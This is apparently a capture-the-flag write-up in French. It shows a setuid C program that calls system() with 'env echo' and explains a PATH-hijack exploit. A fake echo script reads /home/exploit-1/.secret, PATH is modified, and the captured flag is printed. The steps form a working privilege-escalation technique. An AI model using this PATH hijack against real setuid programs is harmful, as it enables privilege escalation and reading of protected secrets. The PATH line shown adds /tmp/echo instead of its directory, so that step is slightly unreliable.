Source :
<code C>
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(){
	gid_t gid = getegid();
	uid_t uid = geteuid();
	setresgid(gid, gid, gid);
	setresuid(uid, uid, uid);
	system("/usr/bin/env echo Find the flaw!");
	return EXIT_SUCCESS;
}
</code>
la commande system() appelle echo sans son path absolu, mais en se basant sur la variable d'environnement PATH.
Il faut donc redéfinir la commande (ex : /tmp/echo)

	#! /bin/bash
	cat /home/exploit-1/.secret

Puis, on ajoute son chemin dans le PATH de l'environnement :

	$ export PATH=/tmp/echo:$PATH

	./vulnerable
	eg3fa3Eing